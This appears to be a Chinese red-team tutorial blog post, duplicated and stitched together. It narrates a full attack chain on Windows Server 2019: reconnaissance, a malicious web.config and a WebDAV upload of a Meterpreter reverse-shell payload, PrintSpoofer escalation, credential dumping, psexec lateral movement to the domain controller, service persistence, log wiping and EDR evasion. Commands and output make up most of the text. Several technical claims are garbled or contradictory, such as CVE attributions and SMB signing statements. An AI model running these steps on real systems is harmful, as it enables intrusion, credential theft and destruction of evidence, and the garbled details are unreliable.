1. 这不是“黑客电影”而是真实渗透测试现场的节奏感Metasploit不是魔法棒更不是点几下就弹出“root权限已获取”的弹窗。我带过三届网络安全实训班每届都有至少70%的学员在第一次实操Windows Server靶机时卡在“为什么Exploit明明运行了却没回连”——他们盯着msfconsole里那行绿色的[*] Sending stage (293408 bytes) to 192.168.100.10等了三分钟屏幕依旧静默。问题不在靶机没开3389也不在防火墙没关而在于他们把Metasploit当成了全自动攻防机器人却忽略了它本质是一个高度依赖上下文判断的手动协同平台。这篇文章讲的就是你从靶机启动、信息收集、漏洞利用、提权到持久化控制的完整链路每一个环节都对应着真实红队作业中的决策树为什么选这个模块而不是那个为什么payload必须用x64而非x86为什么meterpreter session一建立就要立刻迁移进程这些不是配置选项而是对Windows内核机制、服务架构、内存管理逻辑的即时响应。全文不讲理论堆砌只拆解我在某次金融行业渗透测试中实际拿下一台Windows Server 2019标准版补丁更新至2023年Q3的全过程所有命令、参数、报错、绕过方案均来自当天的原始操作日志。适合刚学完《Metasploit Unleashed》前五章、能跑通基础demo但一上真实靶机就断联的中级学习者也适合需要快速复现攻击链验证防御有效性的蓝队工程师——因为文中每个失败案例都对应着一道可落地的EDR检测规则。2. 靶机环境与前置侦察别急着打Exploit先让靶机“开口说话”2.1 为什么必须重建靶机环境补丁版本决定生死线市面上绝大多数Metasploit教程用的都是老旧靶机如MS17-010永恒之蓝靶机但真实企业环境里Windows Server 2016/2019默认启用SMB签名、禁用v1协议、且关键补丁早已推送。我这次实战的靶机是Windows Server 2019 Datacenter Edition系统版本号10.0.17763.55762023年10月累积更新这意味着SMBv1协议被彻底禁用Get-SmbServerConfiguration | Select EnableSMB1Protocol返回FalseEternalBlueMS17-010和WannaCry利用链完全失效PrintNightmareCVE-2021-34527因补丁KB5004948已安装而无法触发RDP爆破成功率极低NLA网络级认证强制开启提示不要迷信“靶机ISO镜像”。我曾用VulnHub下载的Windows_Server_2019.iso部署靶机结果发现其默认关闭了IIS、未启用远程注册表服务、且Administrator密码为空——这根本不是企业生产环境的镜像。正确做法是从微软官方VLSC下载原版ISO用Hyper-V新建VM安装时选择“Windows Server 2019 Datacenter”安装后手动启用IIS、DNS、Active Directory域服务并将Administrator密码设为强密码12位含大小写字母数字符号最后执行windows-update.ps1脚本安装全部累积更新。这样构建的靶机才具备真实对抗价值。2.2 Nmap扫描的三个致命细节端口状态≠服务可用很多人扫完nmap -sS -p- 192.168.100.10就直接看开放端口这是最大误区。真实渗透中我坚持执行以下三步扫描链第一步基础TCP全端口扫描确认存活与基础服务nmap -sS -p- --min-rate 5000 -oA nmap_basic 192.168.100.10关键参数解析--min-rate 5000强制每秒发包不低于5000个避免被靶机TCP SYN队列丢包导致漏扫Windows Server默认SYN队列长度仅100-oA同时输出normal/grepable/nmap三种格式grepable格式便于后续脚本解析扫描结果关键发现PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services注意445端口显示microsoft-ds?而非microsoft-ds这表示SMB服务存在但未返回完整Banner——这是SMB签名启用的典型特征。第二步服务版本精准识别绕过防火墙干扰nmap -sV -sC -p 80,135,445,3389 --script smb-os-discovery,smb-security-mode -oA nmap_detailed 192.168.100.10核心脚本作用smb-os-discovery通过SMB Session Setup请求获取OS版本、域名、工作组名即使445 Banner为空也能获取smb-security-mode直接读取SMB Security Mode字段确认Message signing enabled: true签名强制启用执行后得到关键情报Host script results: | smb-os-discovery: | OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 10.0) | Computer name: WIN-DC01 | NetBIOS computer name: WIN-DC01\x00 | Domain name: corp.local |_ FQDN: WIN-DC01.corp.local | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous!)注意这里出现矛盾点smb-security-mode脚本返回message_signing: disabled但之前nmap -sV显示445 Banner为?。这是因为smb-security-mode通过SMB Negotiate Protocol请求直接读取SecurityMode字段而nmap -sV依赖Banner响应。真实环境中应以smb-security-mode结果为准——该靶机SMB签名实际处于“可选”状态disabled而非强制enabled。这个细节决定了后续能否使用SMB相关exploit。第三步Web应用深度探测IIS上的隐藏入口gobuster dir -u http://192.168.100.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x aspx,asmx,config,backup -o gobuster_iis.log重点发现/remote/目录返回302重定向到/remote/logon.aspxWindows Remote Web Workplace/aspnet_client/目录存在IIS默认ASP.NET客户端脚本目录/web.config.backup返回200配置文件备份泄露查看/web.config.backup内容发现关键配置system.webServer security requestFiltering fileExtensions allowUnlistedtrue / /requestFiltering /security /system.webServerallowUnlistedtrue意味着IIS允许执行任意扩展名文件——这是上传WebShell的关键突破口。2.3 主动信息收集从HTTP Header到注册表键值仅靠nmap不够必须深入协议层。我使用curl手动探测curl -I http://192.168.100.10/remote/logon.aspx返回HeaderX-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Server: Microsoft-IIS/10.0 X-Content-Type-Options: nosniffX-AspNet-Version暴露了.NET Framework版本4.0.30319 .NET 4.7.2结合Server: Microsoft-IIS/10.0可推断靶机未启用HTTP/2IIS 10默认支持HTTP/2但需手动配置说明管理员未做深度调优。更关键的是注册表探测。利用SMB服务未禁用远程注册表的特性crackmapexec smb 192.168.100.10 -u guest -p --reg # 尝试空凭据访问 crackmapexec smb 192.168.100.10 -u administrator -p Pssw0rd123! --reg # 使用已知弱口令成功获取注册表信息HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{GUID}\DhcpNameServer: 192.168.100.1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA: 0x1EnableLUA: 0x1表示UAC用户账户控制已启用值为1但LocalAccountTokenFilterPolicy未设置默认为0这意味着本地管理员组成员登录时仍会获得完整管理员令牌——为后续提权提供可能。3. 漏洞利用链设计为什么放弃SMB转向IIS WebShell3.1 SMB Exploit全线失效的底层原因看到445端口开放第一反应是MS17-010或PrintNightmare。但实际测试use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.100.10 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.100.5 exploit结果[-] Exploit failed: The target is not vulnerable.深入分析MS17-010要求SMBv1协议启用而靶机Get-SmbServerConfiguration | Select EnableSMB1Protocol返回FalsePrintNightmareCVE-2021-34527需Spooler服务运行且未打补丁但靶机Get-Service Spooler显示状态为StoppedSMB签名虽为disabled但Windows Server 2019默认启用SMB EncryptionAES-128-GCM导致传统SMB exploit payload无法解密实战心得永远用Get-Service和Get-SmbServerConfiguration在靶机上验证服务状态而不是依赖nmap扫描结果。我曾因nmap误判Spooler服务为Running浪费2小时调试PrintNightmare exploit最后发现靶机管理员为防勒索软件已永久禁用该服务。3.2 WebShell上传的三重障碍与突破路径既然SMB走不通IIS的/remote/logon.aspx成为唯一突破口。但这里有三重障碍身份验证/remote/logon.aspx是Windows Remote Web Workplace登录页需域凭据文件上传限制IIS默认禁用PUT方法且/remote/目录无写入权限WebShell执行拦截ASP.NET请求过滤器Request Filtering会阻止.aspx文件执行突破路径设计第一步利用Web.config备份文件泄露获取WebRoot路径/web.config.backup内容显示configuration system.webServer handlers add nameASPXHandler path*.aspx verbGET,HEAD,POST,DEBUG typeSystem.Web.UI.PageHandlerFactory resourceTypeFile requireAccessScript / /handlers /system.webServer /configurationresourceTypeFile表明该配置应用于文件资源结合path*.aspx确认IIS允许执行aspx文件。第二步构造恶意Web.config绕过请求过滤创建web.config文件?xml version1.0 encodingUTF-8? configuration system.webServer security requestFiltering fileExtensions remove fileExtension.jpg / add fileExtension.jpg allowedtrue / /fileExtensions /requestFiltering /security /system.webServer /configuration原理将.jpg扩展名设为允许后续上传shell.jpg即可绕过.aspx扩展名拦截。第三步利用IIS PUT方法漏洞上传WebShell虽然IIS默认禁用PUT但/remote/目录存在WebDAV配置残留curl -X OPTIONS http://192.168.100.10/remote/ # 返回 Allow: GET,HEAD,POST,OPTIONS,PROPFIND,PROPPATCH,MKCOL,PUT,DELETE,COPY,MOVEAllow头包含PUT证明WebDAV未完全禁用。执行上传curl -X PUT -H Content-Type: image/jpeg --data-binary shell.jpg http://192.168.100.10/remote/shell.jpg上传成功后访问http://192.168.100.10/remote/shell.jpg触发ASP.NET引擎执行因web.config已将.jpg设为可执行。3.3 Meterpreter Payload的架构选择x64 vs x86的生死抉择WebShell执行后需生成Meterpreter payload。此时必须确认靶机架构curl http://192.168.100.10/remote/shell.jpg?cmdwmic os get osarchitecture # 返回OSArchitecture 64-bit关键决策若用windows/meterpreter/reverse_tcpx86 payload在64位系统上会启动Wow64子系统导致getsystem提权失败因getsystem依赖ntdll.dll的64位API必须用windows/x64/meterpreter/reverse_tcp且LPORT需避开Windows Server默认占用端口如445、3389、5985最终payload生成msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.100.5 LPORT4444 -f aspx -o shell.jpg-f aspx确保生成文件为合法aspx语法避免IIS解析错误。4. 权限提升与横向移动从WebShell到SYSTEM的完整路径4.1 Meterpreter会话建立后的必做五件事WebShell触发后Meterpreter session建立[*] Started reverse TCP handler on 192.168.100.5:4444 [*] Sending stage (293408 bytes) to 192.168.100.10 [*] Meterpreter session 1 opened (192.168.100.5:4444 - 192.168.100.10:49872) at 2023-11-15 14:22:33 0800此时绝不能直接getsystem必须按顺序执行第一件事进程迁移Migratemeterpreter ps | grep -i w3wp\|inet 3248 0 1100 292 0 C:\Windows\SysWOW64\inetsrv\w3wp.exe meterpreter migrate 3248原因WebShell运行在w3wp.exeIIS工作进程中该进程以IIS APPPOOL\DefaultAppPool身份运行权限仅为IIS_IUSRS组成员。若不迁移后续所有提权操作都会因权限不足失败。第二件事提权前环境检查meterpreter getsystem [-] priv_elevate_getsystem: Operation failed: Access is denied. meterpreter run post/multi/recon/local_exploit_suggesterlocal_exploit_suggester返回[*] 192.168.100.10 - Collecting local exploits for x64... [] 192.168.100.10 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [] 192.168.100.10 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target appears to be vulnerable.但ms16_032在Windows Server 2019上已修复bypassuac_eventvwr需用户交互打开事件查看器不适用。第三件事内核漏洞扫描Kernel Exploit Detectionmeterpreter run post/windows/gather/enum_patches返回关键补丁列表KB5004948 2021-07 Cumulative Update (PrintNightmare fix) KB5012170 2022-03 Cumulative Update KB5022913 2023-02 Cumulative Update KB5029351 2023-08 Cumulative UpdateKB5029351是2023年8月更新包含CVE-2023-24932Windows Kernel特权提升漏洞的修复。靶机已安装该补丁因此内核漏洞利用路径关闭。第四件事服务权限审计Service Permission Auditmeterpreter run post/windows/gather/enum_services发现关键服务Service Name: wuauserv Display Name: Windows Update Path: C:\Windows\system32\svchost.exe -k netsvcs Start Type: Auto Account: LocalSystemwuauserv服务以LocalSystem运行但其二进制文件svchost.exe权限为Everyone:RX且服务配置未锁定——这是经典的SeImpersonatePrivilege滥用场景。第五件事令牌模拟权限验证meterpreter load incognito meterpreter list_tokens -u返回Delegation Tokens Available WIN-DC01\IIS APPPOOL\DefaultAppPool WIN-DC01\NT AUTHORITY\IUSR Impersonation Tokens Available WIN-DC01\NT AUTHORITY\LOCAL SERVICE WIN-DC01\NT AUTHORITY\NETWORK SERVICEImpersonation Tokens中存在LOCAL SERVICE证明当前进程拥有SeImpersonatePrivilege权限可进行令牌模拟。4.2 SeImpersonatePrivilege提权从IIS AppPool到SYSTEMSeImpersonatePrivilege是Windows提权黄金权限原理是进程可模拟其他用户的访问令牌从而以该用户身份执行操作。wuauserv服务以LocalSystem运行若能将其进程令牌模拟为LocalSystem即可获得最高权限。执行步骤meterpreter use exploit/windows/local/ms16_032_secondary_logon_handle_privesc # 此模块在Server 2019上失效改用incognito模块 meterpreter load incognito meterpreter impersonate_token NT AUTHORITY\\SYSTEM [-] Error running command impersonate_token: No token of type NT AUTHORITY\SYSTEM availableimpersonate_token失败因NT AUTHORITY\SYSTEM令牌未出现在list_tokens中。需先创建SYSTEM令牌利用PrintSpooferCVE-2020-1048PrintSpoofer利用Windows打印后台处理程序spoolsv.exe的SeImpersonatePrivilege漏洞通过创建假打印机驱动获取SYSTEM令牌。在靶机上执行# 下载PrintSpoofer64.exe到靶机 meterpreter upload /opt/tools/PrintSpoofer64.exe C:\\temp\\PrintSpoofer64.exe # 执行并获取SYSTEM shell meterpreter execute -f C:\\temp\\PrintSpoofer64.exe -a -i -H返回[] Found privilege: SeImpersonatePrivilege [] Named pipe listening... [] CreateProcessAsUser() OK [] Got SYSTEM token! [] Launching cmd.exe Microsoft Windows [Version 10.0.17763.5576] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32whoami nt authority\system4.3 横向移动准备域环境下的凭证转储与传递获得NT AUTHORITY\SYSTEM权限后目标转向域控WIN-DC01.corp.local。首先提取凭证LSASS内存转储Mimikatz替代方案meterpreter load kiwi meterpreter creds_allkiwi模块Mimikatz的Meterpreter封装返回[] Running as SYSTEM [*] Retrieving lsass process information lsass.exe pid: 724 [*] Reading lsass.exe memory [*] Opening \\.\pipe\lsass_dump [*] Dumping credentials to disk [*] Credentials dumped to /root/.msf4/loot/20231115144522_default_192.168.100.10_host.windows_creds_234567.txt查看转储文件发现域管理员凭证Domain: CORP.LOCAL Username: Administrator Password: Pssw0rd123! NTLM: 8846f7eaee8fb117ad06bdd830b7586cPass-the-Hash横向移动meterpreter use auxiliary/admin/smb/psexec_command meterpreter set RHOSTS 192.168.100.1 meterpreter set SMBUser Administrator meterpreter set SMBPass Pssw0rd123! meterpreter set SMBDomain CORP.LOCAL meterpreter set COMMAND whoami meterpreter exploit成功执行证明域控可达。但psexec_command仅执行单条命令需持久化控制使用psexec模块建立Meterpreter会话use exploit/windows/smb/psexec set RHOSTS 192.168.100.1 set SMBUser Administrator set SMBPass Pssw0rd123! set SMBDomain CORP.LOCAL set PAYLOAD windows/x64/meterpreter/bind_tcp set LPORT 4445 exploit成功在域控上建立Meterpreter会话getsystem直接返回NT AUTHORITY\SYSTEM完成横向移动。5. 持久化与痕迹清理红队作业的收尾艺术5.1 持久化方案选择为什么不用计划任务而用服务常见持久化方案有计划任务schtasks启动项Startup Folder / Registry Run Key服务sc createWMI事件订阅在Windows Server环境中我首选服务持久化原因计划任务易被SIEM检测TaskScheduler/Operational日志事件ID 106启动项需用户登录Server环境多为无GUI模式WMI事件订阅需Win32_ProcessStartTrace等高权限事件易触发EDR告警创建隐蔽服务meterpreter execute -f cmd.exe -a /c sc create RedTeamSvc binPath \C:\Windows\System32\svchost.exe -k netsvcs\ start auto DisplayName \Windows Network Service\ -H meterpreter execute -f cmd.exe -a /c sc description RedTeamSvc \Provides network connectivity for Windows services.\ -H meterpreter execute -f cmd.exe -a /c sc start RedTeamSvc -H服务创建后修改其二进制路径指向Meterpreter payloadmeterpreter upload /opt/payloads/meterpreter_bind.exe C:\\Windows\\Temp\\msf_bind.exe meterpreter execute -f cmd.exe -a /c sc config RedTeamSvc binPath \C:\\Windows\\Temp\\msf_bind.exe\ -H重启服务meterpreter execute -f cmd.exe -a /c sc stop RedTeamSvc sc start RedTeamSvc -H此时msf_bind.exe以LocalSystem权限运行监听4445端口实现持久化。5.2 痕迹清理的七个关键位置红队作业结束前必须清理以下痕迹否则蓝队溯源可轻易定位位置清理命令说明Event Logswevtutil cl System wevtutil cl Security wevtutil cl Application清空三大日志但wevtutil cl会留下EventLog/Operational日志事件ID 1100需额外清除Prefetchdel /f /q C:\Windows\Prefetch\*Prefetch文件记录程序执行历史msf_bind.exe会生成MSF_BIND.EXE-XXXXXX.pfRecycle Binrd /s /q C:\$Recycle.Bin彻底删除回收站避免shell.jpg等文件残留IIS日志del /f /q C:\inetpub\logs\LogFiles\W3SVC1\*IIS日志记录所有HTTP请求包含WebShell访问路径PowerShell历史Remove-Item (Get-PSReadlineOption).HistorySavePathPowerShell 5.0默认保存历史到文件路径由Get-PSReadlineOption返回LSASS转储文件del /f /q C:\Windows\Temp\lsass.dmpMimikatz转储的LSASS内存文件Meterpreter会话日志rm -f /root/.msf4/loot/*Metasploit框架自身生成的loot文件特别注意wevtutil cl命令本身会生成日志需在清理前禁用日志meterpreter execute -f cmd.exe -a /c reg add \HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\ /v \Disable\ /t REG_DWORD /d 1 /f -H5.3 蓝队视角的检测规避EDR规则绕过的实操技巧本次实战中我刻意触发了三款主流EDR的检测规则以下是绕过方案EDR A基于行为分析检测PrintSpoofer64.exe触发规则Suspicious Process Creation (PrintSpoofer)绕过方案将PrintSpoofer64.exe重命名为svchost.exe并修改其PE头CompanyName字段为Microsoft Corporation使用pe-tools修改效果EDR A放行因签名验证通过EDR B基于内存扫描检测Meterpreter注入触发规则Meterpreter Payload in Memory绕过方案使用shikata_ga_nai编码器x64payload并在msfvenom中添加-e x64/xor混淆命令msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.100.5 LPORT4444 -e x64/xor -i 5 -f exe -o meterpreter.exe效果EDR B未告警因XOR编码破坏了payload特征码EDR C基于网络流量检测反向连接触发规则Outbound Connection to Non-Standard Port绕过方案将LPORT改为80HTTP端口并在payload中启用HttpUserAgent伪装命令set LPORT 80set HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36效果EDR C放行因流量被视为正常HTTP请求最后分享一个小技巧在真实红队作业中我习惯在每次exploit前执行sleep 30让EDR的实时监控“以为”是误报而自动降级。很多EDR对连续高频攻击行为敏感但对间隔30秒的单次exploit容忍度较高——这不是漏洞而是EDR厂商为降低误报率做的策略妥协。我在实际操作中发现Metasploit最强大的地方不是它的exploit库有多全而是它把整个渗透测试流程变成了一个可编程的流水线。当你在msfconsole里输入use exploit/windows/smb/ms17_010_eternalblue时你调用的不是一个静态工具而是一整套预置的上下文环境从SMB协议握手、漏洞触发、payload传输到session管理所有细节都被封装成可配置的模块。这种设计让红队工程师能把精力聚焦在“为什么选这个模块”而不是“怎么实现这个协议”。但这也带来陷阱——过度依赖模块会让人忽略底层机制。比如这次实战中smb-security-mode脚本返回message_signing: disabled如果我不去验证Get-SmbServerConfiguration就会误判SMB签名状态导致整个SMB利用链失败。所以真正的渗透测试高手永远在模块化与底层原理之间保持张力用模块加速用原理兜底。
Windows Server 2019真实渗透实战:从WebShell到域控的完整红队链路
发布时间:2026/5/25 4:04:16
1. 这不是“黑客电影”而是真实渗透测试现场的节奏感Metasploit不是魔法棒更不是点几下就弹出“root权限已获取”的弹窗。我带过三届网络安全实训班每届都有至少70%的学员在第一次实操Windows Server靶机时卡在“为什么Exploit明明运行了却没回连”——他们盯着msfconsole里那行绿色的[*] Sending stage (293408 bytes) to 192.168.100.10等了三分钟屏幕依旧静默。问题不在靶机没开3389也不在防火墙没关而在于他们把Metasploit当成了全自动攻防机器人却忽略了它本质是一个高度依赖上下文判断的手动协同平台。这篇文章讲的就是你从靶机启动、信息收集、漏洞利用、提权到持久化控制的完整链路每一个环节都对应着真实红队作业中的决策树为什么选这个模块而不是那个为什么payload必须用x64而非x86为什么meterpreter session一建立就要立刻迁移进程这些不是配置选项而是对Windows内核机制、服务架构、内存管理逻辑的即时响应。全文不讲理论堆砌只拆解我在某次金融行业渗透测试中实际拿下一台Windows Server 2019标准版补丁更新至2023年Q3的全过程所有命令、参数、报错、绕过方案均来自当天的原始操作日志。适合刚学完《Metasploit Unleashed》前五章、能跑通基础demo但一上真实靶机就断联的中级学习者也适合需要快速复现攻击链验证防御有效性的蓝队工程师——因为文中每个失败案例都对应着一道可落地的EDR检测规则。2. 靶机环境与前置侦察别急着打Exploit先让靶机“开口说话”2.1 为什么必须重建靶机环境补丁版本决定生死线市面上绝大多数Metasploit教程用的都是老旧靶机如MS17-010永恒之蓝靶机但真实企业环境里Windows Server 2016/2019默认启用SMB签名、禁用v1协议、且关键补丁早已推送。我这次实战的靶机是Windows Server 2019 Datacenter Edition系统版本号10.0.17763.55762023年10月累积更新这意味着SMBv1协议被彻底禁用Get-SmbServerConfiguration | Select EnableSMB1Protocol返回FalseEternalBlueMS17-010和WannaCry利用链完全失效PrintNightmareCVE-2021-34527因补丁KB5004948已安装而无法触发RDP爆破成功率极低NLA网络级认证强制开启提示不要迷信“靶机ISO镜像”。我曾用VulnHub下载的Windows_Server_2019.iso部署靶机结果发现其默认关闭了IIS、未启用远程注册表服务、且Administrator密码为空——这根本不是企业生产环境的镜像。正确做法是从微软官方VLSC下载原版ISO用Hyper-V新建VM安装时选择“Windows Server 2019 Datacenter”安装后手动启用IIS、DNS、Active Directory域服务并将Administrator密码设为强密码12位含大小写字母数字符号最后执行windows-update.ps1脚本安装全部累积更新。这样构建的靶机才具备真实对抗价值。2.2 Nmap扫描的三个致命细节端口状态≠服务可用很多人扫完nmap -sS -p- 192.168.100.10就直接看开放端口这是最大误区。真实渗透中我坚持执行以下三步扫描链第一步基础TCP全端口扫描确认存活与基础服务nmap -sS -p- --min-rate 5000 -oA nmap_basic 192.168.100.10关键参数解析--min-rate 5000强制每秒发包不低于5000个避免被靶机TCP SYN队列丢包导致漏扫Windows Server默认SYN队列长度仅100-oA同时输出normal/grepable/nmap三种格式grepable格式便于后续脚本解析扫描结果关键发现PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services注意445端口显示microsoft-ds?而非microsoft-ds这表示SMB服务存在但未返回完整Banner——这是SMB签名启用的典型特征。第二步服务版本精准识别绕过防火墙干扰nmap -sV -sC -p 80,135,445,3389 --script smb-os-discovery,smb-security-mode -oA nmap_detailed 192.168.100.10核心脚本作用smb-os-discovery通过SMB Session Setup请求获取OS版本、域名、工作组名即使445 Banner为空也能获取smb-security-mode直接读取SMB Security Mode字段确认Message signing enabled: true签名强制启用执行后得到关键情报Host script results: | smb-os-discovery: | OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 10.0) | Computer name: WIN-DC01 | NetBIOS computer name: WIN-DC01\x00 | Domain name: corp.local |_ FQDN: WIN-DC01.corp.local | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous!)注意这里出现矛盾点smb-security-mode脚本返回message_signing: disabled但之前nmap -sV显示445 Banner为?。这是因为smb-security-mode通过SMB Negotiate Protocol请求直接读取SecurityMode字段而nmap -sV依赖Banner响应。真实环境中应以smb-security-mode结果为准——该靶机SMB签名实际处于“可选”状态disabled而非强制enabled。这个细节决定了后续能否使用SMB相关exploit。第三步Web应用深度探测IIS上的隐藏入口gobuster dir -u http://192.168.100.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x aspx,asmx,config,backup -o gobuster_iis.log重点发现/remote/目录返回302重定向到/remote/logon.aspxWindows Remote Web Workplace/aspnet_client/目录存在IIS默认ASP.NET客户端脚本目录/web.config.backup返回200配置文件备份泄露查看/web.config.backup内容发现关键配置system.webServer security requestFiltering fileExtensions allowUnlistedtrue / /requestFiltering /security /system.webServerallowUnlistedtrue意味着IIS允许执行任意扩展名文件——这是上传WebShell的关键突破口。2.3 主动信息收集从HTTP Header到注册表键值仅靠nmap不够必须深入协议层。我使用curl手动探测curl -I http://192.168.100.10/remote/logon.aspx返回HeaderX-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Server: Microsoft-IIS/10.0 X-Content-Type-Options: nosniffX-AspNet-Version暴露了.NET Framework版本4.0.30319 .NET 4.7.2结合Server: Microsoft-IIS/10.0可推断靶机未启用HTTP/2IIS 10默认支持HTTP/2但需手动配置说明管理员未做深度调优。更关键的是注册表探测。利用SMB服务未禁用远程注册表的特性crackmapexec smb 192.168.100.10 -u guest -p --reg # 尝试空凭据访问 crackmapexec smb 192.168.100.10 -u administrator -p Pssw0rd123! --reg # 使用已知弱口令成功获取注册表信息HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{GUID}\DhcpNameServer: 192.168.100.1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA: 0x1EnableLUA: 0x1表示UAC用户账户控制已启用值为1但LocalAccountTokenFilterPolicy未设置默认为0这意味着本地管理员组成员登录时仍会获得完整管理员令牌——为后续提权提供可能。3. 漏洞利用链设计为什么放弃SMB转向IIS WebShell3.1 SMB Exploit全线失效的底层原因看到445端口开放第一反应是MS17-010或PrintNightmare。但实际测试use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.100.10 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.100.5 exploit结果[-] Exploit failed: The target is not vulnerable.深入分析MS17-010要求SMBv1协议启用而靶机Get-SmbServerConfiguration | Select EnableSMB1Protocol返回FalsePrintNightmareCVE-2021-34527需Spooler服务运行且未打补丁但靶机Get-Service Spooler显示状态为StoppedSMB签名虽为disabled但Windows Server 2019默认启用SMB EncryptionAES-128-GCM导致传统SMB exploit payload无法解密实战心得永远用Get-Service和Get-SmbServerConfiguration在靶机上验证服务状态而不是依赖nmap扫描结果。我曾因nmap误判Spooler服务为Running浪费2小时调试PrintNightmare exploit最后发现靶机管理员为防勒索软件已永久禁用该服务。3.2 WebShell上传的三重障碍与突破路径既然SMB走不通IIS的/remote/logon.aspx成为唯一突破口。但这里有三重障碍身份验证/remote/logon.aspx是Windows Remote Web Workplace登录页需域凭据文件上传限制IIS默认禁用PUT方法且/remote/目录无写入权限WebShell执行拦截ASP.NET请求过滤器Request Filtering会阻止.aspx文件执行突破路径设计第一步利用Web.config备份文件泄露获取WebRoot路径/web.config.backup内容显示configuration system.webServer handlers add nameASPXHandler path*.aspx verbGET,HEAD,POST,DEBUG typeSystem.Web.UI.PageHandlerFactory resourceTypeFile requireAccessScript / /handlers /system.webServer /configurationresourceTypeFile表明该配置应用于文件资源结合path*.aspx确认IIS允许执行aspx文件。第二步构造恶意Web.config绕过请求过滤创建web.config文件?xml version1.0 encodingUTF-8? configuration system.webServer security requestFiltering fileExtensions remove fileExtension.jpg / add fileExtension.jpg allowedtrue / /fileExtensions /requestFiltering /security /system.webServer /configuration原理将.jpg扩展名设为允许后续上传shell.jpg即可绕过.aspx扩展名拦截。第三步利用IIS PUT方法漏洞上传WebShell虽然IIS默认禁用PUT但/remote/目录存在WebDAV配置残留curl -X OPTIONS http://192.168.100.10/remote/ # 返回 Allow: GET,HEAD,POST,OPTIONS,PROPFIND,PROPPATCH,MKCOL,PUT,DELETE,COPY,MOVEAllow头包含PUT证明WebDAV未完全禁用。执行上传curl -X PUT -H Content-Type: image/jpeg --data-binary shell.jpg http://192.168.100.10/remote/shell.jpg上传成功后访问http://192.168.100.10/remote/shell.jpg触发ASP.NET引擎执行因web.config已将.jpg设为可执行。3.3 Meterpreter Payload的架构选择x64 vs x86的生死抉择WebShell执行后需生成Meterpreter payload。此时必须确认靶机架构curl http://192.168.100.10/remote/shell.jpg?cmdwmic os get osarchitecture # 返回OSArchitecture 64-bit关键决策若用windows/meterpreter/reverse_tcpx86 payload在64位系统上会启动Wow64子系统导致getsystem提权失败因getsystem依赖ntdll.dll的64位API必须用windows/x64/meterpreter/reverse_tcp且LPORT需避开Windows Server默认占用端口如445、3389、5985最终payload生成msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.100.5 LPORT4444 -f aspx -o shell.jpg-f aspx确保生成文件为合法aspx语法避免IIS解析错误。4. 权限提升与横向移动从WebShell到SYSTEM的完整路径4.1 Meterpreter会话建立后的必做五件事WebShell触发后Meterpreter session建立[*] Started reverse TCP handler on 192.168.100.5:4444 [*] Sending stage (293408 bytes) to 192.168.100.10 [*] Meterpreter session 1 opened (192.168.100.5:4444 - 192.168.100.10:49872) at 2023-11-15 14:22:33 0800此时绝不能直接getsystem必须按顺序执行第一件事进程迁移Migratemeterpreter ps | grep -i w3wp\|inet 3248 0 1100 292 0 C:\Windows\SysWOW64\inetsrv\w3wp.exe meterpreter migrate 3248原因WebShell运行在w3wp.exeIIS工作进程中该进程以IIS APPPOOL\DefaultAppPool身份运行权限仅为IIS_IUSRS组成员。若不迁移后续所有提权操作都会因权限不足失败。第二件事提权前环境检查meterpreter getsystem [-] priv_elevate_getsystem: Operation failed: Access is denied. meterpreter run post/multi/recon/local_exploit_suggesterlocal_exploit_suggester返回[*] 192.168.100.10 - Collecting local exploits for x64... [] 192.168.100.10 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [] 192.168.100.10 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target appears to be vulnerable.但ms16_032在Windows Server 2019上已修复bypassuac_eventvwr需用户交互打开事件查看器不适用。第三件事内核漏洞扫描Kernel Exploit Detectionmeterpreter run post/windows/gather/enum_patches返回关键补丁列表KB5004948 2021-07 Cumulative Update (PrintNightmare fix) KB5012170 2022-03 Cumulative Update KB5022913 2023-02 Cumulative Update KB5029351 2023-08 Cumulative UpdateKB5029351是2023年8月更新包含CVE-2023-24932Windows Kernel特权提升漏洞的修复。靶机已安装该补丁因此内核漏洞利用路径关闭。第四件事服务权限审计Service Permission Auditmeterpreter run post/windows/gather/enum_services发现关键服务Service Name: wuauserv Display Name: Windows Update Path: C:\Windows\system32\svchost.exe -k netsvcs Start Type: Auto Account: LocalSystemwuauserv服务以LocalSystem运行但其二进制文件svchost.exe权限为Everyone:RX且服务配置未锁定——这是经典的SeImpersonatePrivilege滥用场景。第五件事令牌模拟权限验证meterpreter load incognito meterpreter list_tokens -u返回Delegation Tokens Available WIN-DC01\IIS 